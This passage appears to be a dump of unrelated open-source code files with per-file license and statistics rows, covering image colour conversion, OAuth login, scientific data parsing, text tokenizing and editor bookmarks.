    # On Windows, `img` holds a reference to `string` and misbehaves
    # when the string goes out of scope, hence the deep copy.
return img.copy()
def rgb_to_gray(arr):
""" Converts an RGB numpy array to grayscale. """
r = arr[:, :, 0].astype(np.float)
g = arr[:, :, 1].astype(np.float)
b = arr[:, :, 2].astype(np.float)
garr = 0.299*r + 0.587*g + 0.114*b
return garr.astype(np.uint8)
def gray_to_rgb(arr):
""" Converts intensity array to RGB. """
return np.dstack([arr, arr, arr])
def rgb_to_yuv(arr):
"Converts RGB array to YUV."
r = arr[:, :, 0].astype(np.float)
g = arr[:, :, 1].astype(np.float)
b = arr[:, :, 2].astype(np.float)
y = r*.299000 + g*.587000 + b*.114000
u = r*-.168736 + g*-.331264 + b*.500000 + 128
v = r*.500000 + g*-.418688 + b*-.081312 + 128
ret = np.dstack([y, u, v])
ret = np.clip(ret, 0, 255)
return ret.astype(np.uint8)
def yuv_to_rgb(arr):
"Converts YUV array to RGB"
y = arr[:, :, 0].astype(np.float)
u = arr[:, :, 1].astype(np.float)
v = arr[:, :, 2].astype(np.float)
r = y + 1.4075 * (v - 128)
g = y - 0.3455 * (u - 128) - (0.7169 * (v - 128))
b = y + 1.7790 * (u - 128)
ret = np.dstack([r, g, b])
ret = np.clip(ret, 0, 255)
return ret.astype(np.uint8)
def fft_to_qimage(arr):
"""Converts frquency spectrum magnitude image to displayable qimage.
To make the image visually conceivable, we take the log of the array.
Otherwise, there is just too much difference between the maxima and minima.
"""
    magnitude_log = np.log(1 + arr)  # To avoid computing log(0).
    mn = magnitude_log.min()
    mx = magnitude_log.max()
    norm_img = 255*(magnitude_log - mn)/(mx - mn)
    norm_img = norm_img.astype(np.uint8)
rgb_image = gray_to_rgb(norm_img)
return numpy_to_qimage(rgb_image)
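# --- Illustrative round-trip check (added for clarity; not part of the
# original module). Assumes a little-endian platform, where ARGB32 pixels
# are laid out as B,G,R,A bytes, as the converters above expect.
if __name__ == '__main__':
    rgb = np.random.randint(0, 256, (4, 6, 3)).astype(np.uint8)
    restored = qimage_to_numpy(numpy_to_qimage(rgb))
    assert (rgb == restored).all()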
| bsd-3-clause | -2,712,060,152,697,588,000 | 25.954955 | 79 | 0.583556 | false | 2.941986 | false | false | false |
fro391/Investing | ArticleScrape/Econ_Word_Scrape.py | 1 | 1039 | from newspaper import Article
import re
def textDownload (H_Link):
#gets article portion of the htmltext
try:
a = Article(H_Link)
a.download()
a.parse()
UnicodeArticle = a.text
StringArticle = UnicodeArticle.encode('ascii','ignore')
StrippedArticle = StringArticle.replace('\n','')
return StrippedArticle
except Exception as ex:
template = "An exception of type {0} occured. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print message
def countKeyWords (text,keyword):
#returns count of given keyword
regex = keyword
pattern = re.compile(regex,re.IGNORECASE)
l = re.findall(pattern,text)
    return 'There are '+str(len(l))+ ' occurrences of \"'+ keyword +'\" in the article.'
if __name__ == '__main__':
keyword = 'percent' #not case sensitive
html_link = 'https://www.federalreserve.gov/newsevents/pressreleases/monetary20170201a.htm'
print countKeyWords(textDownload(html_link),keyword) | gpl-2.0 | 3,965,828,110,465,999,400 | 32.548387 | 95 | 0.655438 | false | 3.73741 | false | false | false |
kernel1983/tornado_WeiboMixin | auth.py | 1 | 2378 | import time
import random
import string
import urlparse
import urllib
import hashlib
import tornado.web
import tornado.template
import tornado.auth
import tornado.escape
from setting import settings
import functools
from tornado import httpclient
from tornado import escape
class WeiboMixin(tornado.auth.OAuth2Mixin):
_OAUTH_ACCESS_TOKEN_URL = "https://api.weibo.com/oauth2/access_token"
_OAUTH_AUTHORIZE_URL = "https://api.weibo.com/oauth2/authorize"
@tornado.web.asynchronous
def get_authenticated_user(self, redirect_uri, client_id, client_secret,
code, callback, extra_fields=None):
http = httpclient.AsyncHTTPClient()
fields = set()
if extra_fields:
fields.update(extra_fields)
args = {
"redirect_uri": redirect_uri,
"code": code,
"client_id": client_id,
"client_secret": client_secret,
"grant_type": "authorization_code"
}
http.fetch(self._OAUTH_ACCESS_TOKEN_URL,
self.async_callback(self._on_access_token, redirect_uri, client_id, client_secret, callback, fields),
method="POST", body=urllib.urlencode(args))
@tornado.web.asynchronous
def _on_access_token(self, redirect_uri, client_id, client_secret,
callback, fields, response):
session = escape.json_decode(response.body)
callback(session)
class WeiboHandler(tornado.web.RequestHandler,
WeiboMixin):
@tornado.web.asynchronous
def get(self):
redirect_uri = "%s://%s%s" % (self.request.protocol, self.request.host, self.request.path)
code = self.get_argument("code", None)
if code:
self.get_authenticated_user(redirect_uri, settings["WeiboAppKey"], settings["WeiboAppSecret"],
code, self._on_auth)
return
self.authorize_redirect(redirect_uri,
client_id=settings["WeiboAppKey"],
extra_params={"response_type": "code"})
def _on_auth(self, session):
self.finish(session)
class LogoutHandler(tornado.web.RequestHandler):
def get(self):
self.redirect_url = self.get_argument("next", "/")
self.clear_cookie("user")
self.redirect(self.redirect_url)
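# --- Hedged wiring sketch (added; not part of the original file). The
# handlers above are assumed to be mounted like any Tornado handlers, with
# WeiboAppKey/WeiboAppSecret supplied by the imported `settings` dict:
#
#     application = tornado.web.Application([
#         (r"/auth/weibo", WeiboHandler),
#         (r"/logout", LogoutHandler),
#     ])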
| mit | 1,040,992,154,674,021,400 | 30.706667 | 113 | 0.619428 | false | 3.976589 | false | false | false |
scidam/leafs | leaf/leaf/main/mcreate.py | 1 | 2215 | from .models import LeafData
import csv
from datetime import datetime
import re
import os
from geoposition import Geoposition
from decimal import Decimal
from django.core.files import File
import matplotlib.pyplot as plt
def _get_data_from_filename(filename):
datepat = re.compile(r'.+\_(?P<day>\d\d)\_(?P<month>\d\d)\_(?P<year>\d\d\d\d).+')
match = datepat.match(filename)
return (match.group('day'), match.group('month'), match.group('year')) if match else None
def to_decimal(s):
try:
res = Decimal(s)
except:
res = Decimal()
return res
with open('eggs.csv', 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in spamreader:
ld = LeafData.objects.create()
cdate = _get_data_from_filename(row[0])
if cdate:
try:
ld.collected = datetime(int(cdate[2]), int(cdate[1]), int(cdate[0]))
except:
pass
ld.filename = row[0]
ld.species = row[1]
ld.where = Geoposition(to_decimal(row[2]), to_decimal(row[3]))
srcs = row[4].split(',')
if len(srcs) > 1:
with open(srcs[0], 'r') as f:
fd = File(f)
ld.source1.save(os.path.basename(srcs[0]),fd, save=True)
with open(srcs[1], 'r') as f:
fd = File(f)
ld.source2.save(os.path.basename(srcs[1]),fd, save=True)
elif len(srcs) == 1 and len(srcs[0]) > 0:
with open(srcs[0], 'r') as f:
fd = File(f)
ld.source1.save(os.path.basename(srcs[0]),fd, save=True)
ld.xdata = row[5]
ld.ydata = row[6]
        with open('leafcont%s.png' % ld.pk, 'wb+') as inpf:  # binary mode: savefig writes PNG bytes
f = plt.figure()
ax = f.add_subplot('111')
x = map(lambda x: float(x), row[5].split(','))
y = map(lambda x: float(x), row[6].split(','))
ax.plot(x,y)
ax.set_aspect('equal')
ax.grid('on')
f.savefig(inpf, dpi=200)
plt.close(plt.gcf())
inpf.seek(0)
ld.leafcont.save('leafcont%s.png'%ld.pk, File(inpf), save=True)
ld.save()
| mit | 3,333,425,212,414,557,000 | 33.092308 | 93 | 0.530023 | false | 3.182471 | false | false | false |
tivaliy/python-gerritclient | gerritclient/tests/utils/fake_comment.py | 1 | 1586 | #
# Copyright 2017 Vitalii Kulanov
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
def get_fake_comment(patch_set=None, comment_id=None, line=None, message=None,
author=None):
"""Creates a fake comment."""
return {
"patch_set": patch_set or 1,
"id": comment_id or "TvcXrmjM",
"line": line or 23,
"message": message or "[nit] trailing whitespace",
"updated": "2013-02-26 15:40:43.986000000",
"author": author or {
"_account_id": 1000096,
"name": "John Doe",
"email": "john.doe@example.com"
}
}
def get_fake_comments(comment_count, **kwargs):
"""Creates a random fake list of comments."""
return [get_fake_comment(**kwargs) for _ in range(comment_count)]
def get_fake_comments_in_change(comment_count, path=None, **kwargs):
"""Creates a random fake list of comments in change."""
return {
path or "gerrit-server/fake/path/to/file":
get_fake_comments(comment_count, **kwargs)
}
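# Illustrative usage (added for clarity; the values are the fakes this module
# generates, not real Gerrit data):
if __name__ == '__main__':
    change = get_fake_comments_in_change(2, path='src/Main.java', line=42)
    print(list(change))                  # -> ['src/Main.java']
    print(len(change['src/Main.java']))  # -> 2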
| apache-2.0 | 7,630,968,110,726,776,000 | 32.744681 | 78 | 0.630517 | false | 3.740566 | false | false | false |
hlamer/qutepart | qutepart/bookmarks.py | 2 | 3298 | """Bookmarks functionality implementation"""
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QAction
from PyQt5.QtGui import QKeySequence, QTextCursor
import qutepart
class Bookmarks:
"""Bookmarks functionality implementation, grouped in one class
"""
def __init__(self, qpart, markArea):
self._qpart = qpart
self._markArea = markArea
        qpart.toggleBookmarkAction = self._createAction(qpart, "emblem-favorite", "Toggle bookmark", 'Ctrl+B',
self._onToggleBookmark)
qpart.prevBookmarkAction = self._createAction(qpart, "go-up", "Previous bookmark", 'Alt+PgUp',
self._onPrevBookmark)
qpart.nextBookmarkAction = self._createAction(qpart, "go-down", "Next bookmark", 'Alt+PgDown',
self._onNextBookmark)
markArea.blockClicked.connect(self._toggleBookmark)
def _createAction(self, widget, iconFileName, text, shortcut, slot):
"""Create QAction with given parameters and add to the widget
"""
icon = qutepart.getIcon(iconFileName)
action = QAction(icon, text, widget)
action.setShortcut(QKeySequence(shortcut))
action.setShortcutContext(Qt.WidgetShortcut)
action.triggered.connect(slot)
widget.addAction(action)
return action
def removeActions(self):
self._qpart.removeAction(self._qpart.toggleBookmarkAction)
self._qpart.toggleBookmarkAction = None
self._qpart.removeAction(self._qpart.prevBookmarkAction)
self._qpart.prevBookmarkAction = None
self._qpart.removeAction(self._qpart.nextBookmarkAction)
self._qpart.nextBookmarkAction = None
def clear(self, startBlock, endBlock):
"""Clear bookmarks on block range including start and end
"""
for block in qutepart.iterateBlocksFrom(startBlock):
self._setBlockMarked(block, False)
if block == endBlock:
break
def isBlockMarked(self, block):
"""Check if block is bookmarked
"""
return self._markArea.isBlockMarked(block)
def _setBlockMarked(self, block, marked):
"""Set block bookmarked
"""
self._markArea.setBlockValue(block, 1 if marked else 0)
def _toggleBookmark(self, block):
self._markArea.toggleBlockMark(block)
self._markArea.update()
def _onToggleBookmark(self):
"""Toogle Bookmark action triggered
"""
self._toggleBookmark(self._qpart.textCursor().block())
def _onPrevBookmark(self):
"""Previous Bookmark action triggered. Move cursor
"""
for block in qutepart.iterateBlocksBackFrom(self._qpart.textCursor().block().previous()):
if self.isBlockMarked(block):
self._qpart.setTextCursor(QTextCursor(block))
return
def _onNextBookmark(self):
"""Previous Bookmark action triggered. Move cursor
"""
for block in qutepart.iterateBlocksFrom(self._qpart.textCursor().block().next()):
if self.isBlockMarked(block):
self._qpart.setTextCursor(QTextCursor(block))
return
| lgpl-2.1 | 3,291,824,203,735,315,000 | 36.908046 | 110 | 0.625531 | false | 4.206633 | false | false | false |
lmaurits/phyltr | src/phyltr/plumbing/sinks.py | 1 | 1699 | import sys
class NewickFormatter:
def __init__(self, out=sys.stdout, annotations=True, topology_only=False):
self.out = out
self.annotations = annotations
self.topology_only = topology_only
def consume(self, stream):
first = True
for t in stream:
if first:
first = False
feature_names = set()
for n in t.traverse():
feature_names |= n.features
for standard_feature in ("dist", "name", "support"):
feature_names.remove(standard_feature)
if self.topology_only:
self.out.write(t.write(format=9))
elif self.annotations:
self.out.write(t.write(features=feature_names, format_root_node=True))
else:
self.out.write(t.write())
self.out.write("\n")
class NullSink:
def __init__(self, out=sys.stdout):
self.out = out
def consume(self, stream):
for t in stream:
pass
class StringFormatter:
def __init__(self, out=sys.stdout):
self.out = out
def consume(self, stream):
for x in stream:
if isinstance(x, str):
self.out.write(x)
else:
try:
self.out.write("\n".join((str(element) for element in x)))
except TypeError:
self.out.write(str(x))
self.out.write("\n")
class ListPerLineFormatter:
def __init__(self, out=sys.stdout):
self.out = out
def consume(self, stream):
for lst in stream:
self.out.write("\n".join(lst))
| gpl-3.0 | -4,268,954,458,629,410,300 | 25.546875 | 86 | 0.516186 | false | 4.164216 | false | false | false |
SegFaultAX/graffiti | graffiti/core.py | 1 | 4367 | #!/usr/bin/env python
# Copyright (c) 2014 Michael-Keith Bernard
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from graffiti import util
__author__ = "Michael-Keith Bernard"
def schema(v):
if hasattr(v, "_schema"):
return v._schema
return util.fninfo(v if callable(v) else lambda: v)
def dependencies(g):
deps = {}
for k, v in g.iteritems():
deps[k] = set(v["required"])
return deps
def transitive(deps):
def deps_for(k):
if k not in deps:
return [k]
trans = set(util.concat1(deps_for(e) for e in deps[k]))
return trans | set(deps[k])
return { k: deps_for(k) for k in deps }
def topological(deps):
if not deps:
return []
sources = list(set(deps) - set(util.concat1(deps.values())))
if not sources:
raise ValueError("Graph cycle detected!")
return (sources +
topological(util.select_keys(lambda k, _: k not in sources, deps)))
def required_keys(requested, given, deps):
required = set(requested)
for r in requested:
trans = set(deps[r])
prune = set(util.concat1(deps[t] for t in trans if t in given))
required |= trans - prune
return required
def call_with(schema):
def _invoke(env, key):
fn, args = schema[key]["fn"], schema[key]["args"]
argmap = util.select_keys(lambda k, _: k in args, env)
if hasattr(fn, "_schema"):
res = fn(_env=argmap, _prune_keys=True)
else:
res = fn(**argmap)
return util.merge(env, { key: res })
return _invoke
def compile_graph(g):
if not isinstance(g, dict):
return g
else:
canonical = util.map_vals(compile_graph, g)
schematized = util.map_vals(schema, canonical)
deps = dependencies(schematized)
topo = topological(deps)[::-1]
topo_trans = { k: [e for e in topo if e in v]
for k, v in transitive(deps).iteritems() }
required = set(util.concat1(deps.values())) - set(deps)
optional = util.merge(*[v["optional"] for v in schematized.values()])
nodes = set(deps)
def _graphfn(_env=None, _keys=None, _prune_keys=False, **kwargs):
if _env is None:
_env = {}
_env = util.merge(_env, kwargs)
if required - set(_env):
raise ValueError("Unmet graph requirements!")
if _keys is None:
_keys = set(deps)
needed = nodes
else:
_keys = set(_keys)
needed = required_keys(_keys, _env, topo_trans)
strategy = [e for e in topo if e in needed and e not in _env]
result = reduce(call_with(schematized), strategy, _env)
if _prune_keys:
result = util.select_keys(lambda k, _: k in deps, result)
return result
_graphfn._schema = {
"required": required,
"optional": optional,
"args": required | set(optional),
"fn": _graphfn,
"dependencies": transitive(deps),
"direct_dependencies": deps,
"dependency_ordering": topo_trans,
"schema": schematized,
"graph": canonical,
"ordering": topo,
"nodes": nodes,
}
return _graphfn
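# --- Hedged usage sketch (added for illustration; not part of the original
# module). Assumes util.fninfo reports the lambdas' argument names, as the
# schema handling above suggests. Python 2 print, to match the module.
if __name__ == "__main__":
    stats = compile_graph({
        "n": lambda xs: len(xs),
        "total": lambda xs: sum(xs),
        "mean": lambda n, total: total / float(n),
    })
    result = stats(xs=[1, 2, 3, 4])
    print result["mean"]  # -> 2.5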
| mit | 8,746,022,454,410,757,000 | 33.65873 | 82 | 0.601786 | false | 3.962795 | false | false | false |
iastro-pt/ObservationTools | utils/parse.py | 2 | 3461 | """Functions for parsing the parameter files."""
import os
import logging
from typing import List, Dict, Union
def parse_obslist(fname, path=None):
# type: (str, str) -> List[str]
"""Parse Obslist file containing list of dates/times.
Parameters
----------
fname: str
Filename of obs_list file.
path: str [optional]
Path to directory of filename.
Returns
--------
times: list of strings
Observation times in a list.
"""
if path is not None:
fname = os.path.join(path, fname)
if not os.path.exists(fname):
logging.warning("Obs_list file given does not exist. {}".format(fname))
obstimes = list()
with open(fname, 'r') as f:
for line in f:
if line.startswith("#") or line.isspace() or not line: # Ignores comments and blank/empty lines.
continue
else:
if "#" in line: # Remove comment from end of line
line = line.split("#")[0]
if "." in line:
line = line.split(".")[0] # remove fractions of seconds.
obstimes.append(line.strip())
logging.debug("obstimes = {}",format(obstimes))
return obstimes
def parse_paramfile(param_file, path=None):
# type: (str, str) -> Dict[str, Union[str, float]]
"""Extract orbit and stellar parameters from parameter file.
Parameters
----------
param_file: str
Filename of parameter file.
path: str [optional]
Path to directory of filename.
Returns
--------
parameters: dict
        Parameters as a {param: value} dictionary.
"""
if path is not None:
param_file = os.path.join(path, param_file)
parameters = dict() # type: Dict[str, Union[str, float]]
if not os.path.exists(param_file):
logging.warning("Parameter file given does not exist. {}".format(param_file))
with open(param_file, 'r') as f:
for line in f:
if line.startswith("#") or line.isspace() or not line: # Ignores comments and blank/empty lines.:
pass
else:
if '#' in line: # Remove comment from end of line
line = line.split("#")[0]
if line.endswith("="):
logging.warning(("Parameter missing value in {}.\nLine = {line}."
" Value set to None.").format(param_file, line))
line = line + " None" # Add None value when parameter is missing
par, val = line.lower().split('=')
par, val = par.strip(), val.strip()
if (val.startswith("[") and val.endswith("]")) or ("," in val): # Val is a list
parameters[par] = parse_list_string(val)
else:
try:
parameters[par] = float(val) # Turn parameters to floats if possible.
except ValueError:
parameters[par] = val
return parameters
def parse_list_string(string):
# type: (str) -> List[Union[str, float]]
"""Parse list of floats out of a string."""
string = string.replace("[", "").replace("]", "").strip()
list_str = string.split(",")
try:
return [float(val) for val in list_str]
except ValueError as e:
# Can't turn into floats.
return [val.strip() for val in list_str]
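# Illustrative calls (added; not part of the original module):
if __name__ == "__main__":
    print(parse_list_string("[1.0, 2.5, 3]"))      # -> [1.0, 2.5, 3.0]
    print(parse_list_string("HD 30501, HD 4747"))  # -> ['HD 30501', 'HD 4747']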
| mit | -9,069,334,366,275,485,000 | 34.316327 | 112 | 0.540884 | false | 4.16988 | false | false | false |
d-quinn/bio_quinn2013 | multiple_reference/phased/make_two_vcfs_from_phased.py | 1 | 3495 | import csv
import pprint
def read_hapcut_output(input_hap):
with open(input_hap) as f:
record_lines = []
for line in f:
if not line.startswith('********'):
record_lines.append(line)
else:
yield record_lines
record_lines = []
class Phased_snp:
def __init__(self, snp):
self.snp = snp
self.id = (snp[3], snp[4])
def get_phase(self):
if int(self.snp[1]) == 0 and int(self.snp[2]) == 1:
return 0
elif int(self.snp[2]) == 0 and int(self.snp[1]) == 1:
return 1
else:
raise AssertionError('Error with phasing, row:', self.snp)
def phased_snps(input_hap):
phased_dict = {}
for record in read_hapcut_output(input_hap):
snps = csv.reader(record[1:], delimiter='\t')
for snp in snps:
phased_snp = Phased_snp(snp)
phased_dict[phased_snp.id] = phased_snp
return phased_dict
def make_phased_vcfs(input_vcf, input_hap):
assert input_vcf[-4:] == '.vcf'
out_orig = input_vcf[:-4] + '__orig__.vcf'
out_new = input_vcf[:-4] + '__new__.vcf'
with open(input_vcf, newline='') as i_vcf:
fields = ('CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER',
'INFO', 'FORMAT', 'SAMPLE')
vcf_reader = csv.DictReader(i_vcf, delimiter='\t', fieldnames=fields)
with open(out_orig, 'w', newline='') as o_orig, open(out_new, 'w', newline='') as o_new:
orig_writer = csv.DictWriter(o_orig, fields, delimiter='\t', lineterminator='\n')
new_writer = csv.DictWriter(o_new, fields, delimiter='\t', lineterminator='\n')
phased_dict = phased_snps(input_hap)
phase_count = 0
for row in vcf_reader:
# print(row)
row_id = (row['CHROM'], row['POS'])
# print(row_id)
format_list = row['FORMAT'].split(':')
sample_list = row['SAMPLE'].split(':')
sample_dict = dict(zip(format_list, sample_list))
sample_dict['RD'], sample_dict['AD'] = int(sample_dict['RD']), int(sample_dict['AD'])
# If the SNP is homozygous alternate (i.e. there are only alternate reads),
# Add the SNP to both vcfs
if sample_dict['AD'] > 0 and sample_dict['RD'] == 0:
orig_writer.writerow(row)
new_writer.writerow(row)
# If the SNP is heterozygous and not phased,
# Add the SNP to the new vcf
elif (sample_dict['AD'] > 0 and sample_dict['RD'] > 0 and
row_id not in phased_dict):
new_writer.writerow(row)
# If the SNP is heterozygous and phased,
# Add the SNP to orig_vcf if it is phased as 0, add to new_vcf if phased as 1
elif (sample_dict['AD'] > 0 and sample_dict['RD'] > 0 and
row_id in phased_dict):
phase_count += 1
if phased_dict[row_id].get_phase() == 0:
orig_writer.writerow(row)
elif phased_dict[row_id].get_phase() == 1:
new_writer.writerow(row)
print('Number of SNPs from vcf that were phased:', phase_count)
make_phased_vcfs('/path/to/16_A12_pUn_down_freeze2.vcf',
'/path/to/output_haplotype_file')
| mit | 1,369,937,598,004,088,800 | 36.580645 | 101 | 0.511588 | false | 3.481076 | false | false | false |
shelari/prereform_to_contemporary | word_tokenize.py | 1 | 7361 | # -*- coding: utf-8 -*-
__author__ = 'ElenaSidorova'
import re
SYMBOLS = {
'symbols': [u'[', u']', u'-', u"'"],
'numbers': [u'0', u'1', u'2', u'3', u'4', u'5', u'6', u'7', u'8', u'9'],
'brackets': [u'[', u']']
}
class WordTokenizer(object):
@classmethod
def tokenize(cls, text):
tokens = []
for litera in text:
if not tokens:
tokens.append(litera)
continue
if litera.isalpha():
if tokens[-1][-1].isalpha():
tokens[-1] += litera
elif tokens[-1][-1] in SYMBOLS['symbols']:
tokens[-1] += litera
else:
tokens.append(litera)
continue
if litera in SYMBOLS['symbols']:
if tokens[-1][-1].isalpha():
tokens[-1] += litera
elif tokens[-1][-1] in SYMBOLS['symbols']:
if litera == u'[' and tokens[-1][-1] in SYMBOLS['brackets']:
tokens.append(litera)
continue
if litera == u']' and tokens[-1][-1] in SYMBOLS['brackets']:
tokens.append(litera)
continue
tokens[-1] += litera
else:
tokens.append(litera)
continue
if litera in SYMBOLS['numbers']:
if tokens[-1][-1] in SYMBOLS['numbers']:
tokens[-1] += litera
else:
tokens.append(litera)
continue
tokens.append(litera)
refactored = []
for token in tokens:
if u']' not in token and u'[' not in token:
refactored.append(token)
else:
new = cls.check_token(token)
if isinstance(new, unicode):
refactored.append(token)
else:
refactored += new
refactored = cls.group_brackets(refactored)
return refactored
@classmethod
def group_brackets(cls, tokens):
edited = []
pos = 0
for i, token in enumerate(tokens):
if pos >= len(tokens):
break
if tokens[pos] == u'[':
test_tokens = tokens[pos+1:]
if len(test_tokens) == 0:
edited.append(tokens[pos])
pos += 1
continue
ok_symb = 0
joined = None
arr = []
closed = 0
n = 0
for j, st in enumerate(test_tokens):
if ok_symb > 1:
break
if not st[0].isalpha() and st[0] not in SYMBOLS['symbols']:
if ok_symb > 1:
if closed and arr:
arr = arr[:-1]
if arr:
joined = 1
break
if re.search(u'^\s$', st):
if closed and arr:
joined = 1
break
else:
if not ok_symb:
ok_symb += 1
arr.append(st)
else:
if closed and arr:
joined = 1
break
elif st == u']':
if closed:
if arr:
joined = 1
break
closed = 1
arr.append(st)
elif st == u'[':
if closed and arr:
joined = 1
break
else:
arr.append(st)
n += 1
if joined and arr:
token = token + u''.join(arr)
if not pos:
edited.append(token)
if joined and arr:
pos += n
pos += 1
continue
if joined and arr:
if tokens[pos-1][-1].isalpha() or tokens[pos-1][-1] in SYMBOLS['symbols']:
edited[-1] += token
pos += n
pos += 1
continue
else:
edited.append(token)
pos += 1
else:
edited.append(tokens[pos])
pos += 1
return edited
@classmethod
def check_token(cls, token):
if u'[' in token and u']' not in token:
token = cls.split_token(token)
elif u']' in token and u'[' not in token:
token = cls.split_token(token)
elif cls.check_order_and_amount(token) is None:
token = cls.split_token(token)
return token
@classmethod
def check_order_and_amount(cls, token):
left = []
right = []
for i, litera in enumerate(token):
if litera == u'[':
left.append(i)
if litera == u']':
right.append(i)
if len(left) != len(right):
return None
for i, el in enumerate(left):
if el > right[i]:
return None
if el + 1 == right[i]:
return None
return 1
@classmethod
def split_token(cls, token):
arr = []
single = []
for i, litera in enumerate(token):
if litera in SYMBOLS['brackets']:
single.append(i)
arr.append(litera)
continue
if i-1 >= 0 and i-1 not in single:
if not arr:
arr.append(litera)
else:
arr[-1] += litera
else:
arr.append(litera)
return arr
# a = WordTokenizer()
# b = a.tokenize(u'''...те\nст... токенизатора.''')
# b = a.tokenize(u'обычно[мъ] своемъ мѣстѣ, подлѣ барометра, разставивъ ноги на приличное раз[стояніе], заложивъ руки назадъ и приводя за спиною пальцы въ движеніе тѣмъ быстрѣе, чѣмъ болѣе горячился [13] папа, спереди не выказывалъ ни малѣйшаго знака безпокойства, но, напротивъ, выраженіемъ лица выказывалъ совершенное сознаніе своей правоты и вмѣстѣ съ тѣмъ подвластности.')
# b = a.tokenize(u'«скоб[к»и]»')
# b = u"который [на] обычно[мъ] [своемъ] мѣстѣ, под[лѣ] баро[метра], разст[авивъ], любо[въ] 123 д'артань-ян"
# b = u'qwe[re]fs jk[]jk'
# b = u'«скоб[к»и]po» [скобки]'
# b = a.tokenize(b)
# print u'\n'.join(b)
# print u'\n'.join(a.get_tokens(b)) | mit | 5,302,391,894,709,455,000 | 34.350254 | 376 | 0.402556 | false | 3.76175 | false | false | false |
luis-wang/python_Tesseract_GUI_Demo | demo/mser.py | 1 | 1506 | #!/usr/bin/env python
'''
MSER detector demo
==================
mser.py [<video source>]
ESC - exit
Maximally stable extremal region extractor
forked from python2/mser.py
'''
import os,sys
sys.path.append(r'D:\workspaces\aptana3\openvc_demo\python2')
sys.path.append(r'D:\data\aptana34workspace\computer_cv\python2')
import numpy as np
import cv2
import video
def official_method():
try: video_src = sys.argv[1]
except: video_src = 0
cam = video.create_capture(video_src)
mser = cv2.MSER()
while True:
#ret, img = cam.read()
img = cv2.imread('img/eng_text.png')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
vis = img.copy()
regions = mser.detect(gray, None)
hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions]
cv2.polylines(vis, hulls, 1, (0, 255, 0))
cv2.imshow('img', vis)
if 0xFF & cv2.waitKey(5) == 27:
break
cv2.destroyAllWindows()
if __name__ == '__main__':
mser = cv2.MSER()
#ret, img = cam.read()
#img = cv2.imread('img/eng_text.png')
img = cv2.imread(r'F:\Recovery\bigchi.png')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
vis = img.copy()
regions = mser.detect(gray, None)
print 'type regions : ',type(regions[0])
hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions]
cv2.polylines(vis, hulls, 1, (0, 255, 0))
cv2.imshow('img', vis)
cv2.waitKey(0)
cv2.destroyAllWindows()
| apache-2.0 | -3,223,163,544,533,769,000 | 21.147059 | 70 | 0.596946 | false | 2.794063 | false | false | false |
amiramix/serna-free | serna/i18n/check_literals.py | 5 | 7799 | ##
## Copyright(c) 2009 Syntext, Inc. All Rights Reserved.
## Contact: info@syntext.com, http://www.syntext.com
##
## This file is part of Syntext Serna XML Editor.
##
## COMMERCIAL USAGE
## Licensees holding valid Syntext Serna commercial licenses may use this file
## in accordance with the Syntext Serna Commercial License Agreement provided
## with the software, or, alternatively, in accorance with the terms contained
## in a written agreement between you and Syntext, Inc.
##
## GNU GENERAL PUBLIC LICENSE USAGE
## Alternatively, this file may be used under the terms of the GNU General
## Public License versions 2.0 or 3.0 as published by the Free Software
## Foundation and appearing in the file LICENSE.GPL included in the packaging
## of this file. In addition, as a special exception, Syntext, Inc. gives you
## certain additional rights, which are described in the Syntext, Inc. GPL
## Exception for Syntext Serna Free Edition, included in the file
## GPL_EXCEPTION.txt in this package.
##
## You should have received a copy of appropriate licenses along with this
## package. If not, see <http://www.syntext.com/legal/>. If you are unsure
## which license is appropriate for your use, please contact the sales
## department at sales@syntext.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#!/usr/bin/python
import sys, os, re, datetime
src_re = re.compile(r"^.*\.((cxx)|(h))$", re.I)
skip_re = re.compile(r"^\s*((#\s*include\s+)|(//)).*$")
start_skip = re.compile(r"^\s*//\s*START_IGNORE_LITERALS.*$")
stop_skip = re.compile(r"^\s*//\s*STOP_IGNORE_LITERALS.*$")
complete_line_re = re.compile(r'^.*([\;\}\{])\s*$')
literal_re = re.compile(r'(?P<literal>(?<!\\)".*?(?<!\\)")+')
allowed = [
r"tr",
r"QT_TR(ANSLATE)?_NOOP",
r"NOTR",
r"get(Safe)?Property",
r"makeDescendant",
r"RT_MSG_ASSERT",
r"REGISTER_COMMAND_EVENT_MAKER",
r"GD",
r"DYNCALL\d*",
r"(Q|get)Color",
r"QRegExp",
r"translate",
r"get_translated",
r"inherits"
]
allowed_re = re.compile(r"^(" + '|'.join(allowed) + ")$")
macro_begin = re.compile(r"^(.*\W)?(?P<name>\w+)\s*\($")
def dump(lines, line):
